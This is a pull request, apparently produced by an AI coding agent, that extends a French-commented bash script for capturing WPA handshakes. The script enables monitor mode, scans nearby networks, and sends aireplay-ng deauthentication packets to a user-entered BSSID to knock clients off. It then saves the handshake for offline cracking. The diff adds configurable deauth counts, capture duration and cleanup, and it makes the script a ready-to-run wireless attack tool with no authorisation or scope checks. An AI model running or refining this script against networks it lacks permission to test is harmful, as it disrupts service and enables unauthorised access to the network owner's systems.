### PR TITLE
Improve scan_wifi.sh script

### DIFF
--- a/scripts/scan_wifi.sh
+++ b/scripts/scan_wifi.sh
@@ -2,32 +2,87 @@
 # wifi_pentest.sh - Scan & capture WPA handshake
 set -euo pipefail
 
+# Vérifie les droits root
+if [[ $EUID -ne 0 ]]; then
+    echo "❌ Ce script doit être exécuté en tant que root" >&2
+    exit 1
+fi
+
+# Vérification des outils requis
+for cmd in airmon-ng airodump-ng aireplay-ng; do
+    if ! command -v "$cmd" &>/dev/null; then
+        echo "❌ Outil manquant : $cmd" >&2
+        exit 1
+    fi
+done
+
 INTERFACE="wlan0"
-MONITOR_IF="wlan0mon"
 OUTPUT_DIR="wifi_captures"
-CHANNEL=6  # à adapter selon le réseau cible
+CHANNEL=6
+CAPTURE_TIME=20
+DEAUTH_COUNT=5
+
+usage() {
+    cat <<EOF >&2
+Usage: $0 [-i interface] [-c channel] [-o output_dir] [-t seconds] [-d count]
+  -i interface : interface WiFi à utiliser (par défaut: $INTERFACE)
+  -c channel   : canal WiFi (par défaut: $CHANNEL)
+  -o dir       : dossier de sortie pour la capture (par défaut: $OUTPUT_DIR)
+  -t seconds   : durée de capture (par défaut: $CAPTURE_TIME)
+  -d count     : nombre de paquets de désauth (par défaut: $DEAUTH_COUNT)
+EOF
+    exit 1
+}
+
+while getopts "i:c:o:t:d:h" opt; do
+    case $opt in
+        i) INTERFACE="$OPTARG";;
+        c) CHANNEL="$OPTARG";;
+        o) OUTPUT_DIR="$OPTARG";;
+        t) CAPTURE_TIME="$OPTARG";;
+        d) DEAUTH_COUNT="$OPTARG";;
+        h|*) usage;;
+    esac
+done
+
+MONITOR_IF="${INTERFACE}mon"
 
 mkdir -p "$OUTPUT_DIR"
 
 echo "[*] Activation du mode monitor sur $INTERFACE..."
-airmon-ng start "$INTERFACE"
+airmon-ng start "$INTERFACE" >/dev/null
+
+cleanup() {
+    if [[ -n "${AIRDUMP_PID:-}" ]]; then
+        kill "$AIRDUMP_PID" 2>/dev/null || true
+    fi
+    airmon-ng stop "$MONITOR_IF" >/dev/null || true
+}
+trap cleanup EXIT
 
 echo "[*] Lancement du scan des réseaux disponibles..."
 timeout 20s airodump-ng "$MONITOR_IF"
 
-read -p "Entrez le BSSID cible : " BSSID
-read -p "Entrez le nom (SSID) du réseau : " ESSID
+read -rp "Entrez le BSSID cible : " BSSID
+read -rp "Entrez le nom (SSID) du réseau : " ESSID
 
 echo "[*] Capture du handshake sur $ESSID ($BSSID)..."
-airodump-ng --bssid "$BSSID" --channel "$CHANNEL" --write "$OUTPUT_DIR/handshake" "$MONITOR_IF" &
+CAP_BASENAME="handshake_$(date +%Y%m%d_%H%M%S)"
+airodump-ng --bssid "$BSSID" --channel "$CHANNEL" --write "$OUTPUT_DIR/$CAP_BASENAME" "$MONITOR_IF" &
+AIRDUMP_PID=$!
 
 sleep 5
 echo "[*] Déauthentification d’un client pour forcer handshake..."
-aireplay-ng --deauth 5 -a "$BSSID" "$MONITOR_IF"
+aireplay-ng --deauth "$DEAUTH_COUNT" -a "$BSSID" "$MONITOR_IF"
 
-echo "[*] Attente du handshake..."
-sleep 20
-pkill airodump-ng
+echo "[*] Attente du handshake pendant $CAPTURE_TIME s..."
+sleep "$CAPTURE_TIME"
+kill "$AIRDUMP_PID" 2>/dev/null || true
 
-echo "✅ Capture terminée. Fichier : $OUTPUT_DIR/handshake.cap"
-airmon-ng stop "$MONITOR_IF"
+HANDSHAKE_FILE=$(ls "$OUTPUT_DIR"/${CAP_BASENAME}-*.cap 2>/dev/null | head -n 1 || true)
+if [[ -f "$HANDSHAKE_FILE" ]]; then
+    echo "✅ Capture terminée. Fichier : $HANDSHAKE_FILE"
+else
+    echo "❌ Handshake non capturé" >&2
+fi
+


### PR DESCRIPTION
## Summary
- extend scan_wifi.sh with runtime options
- handle cleanup using airodump PID
- allow custom capture duration and deauth count

## Testing
- `bash -n scripts/scan_wifi.sh`


------
https://chatgpt.com/codex/tasks/task_e_687101597688833281eb55fdc6304c93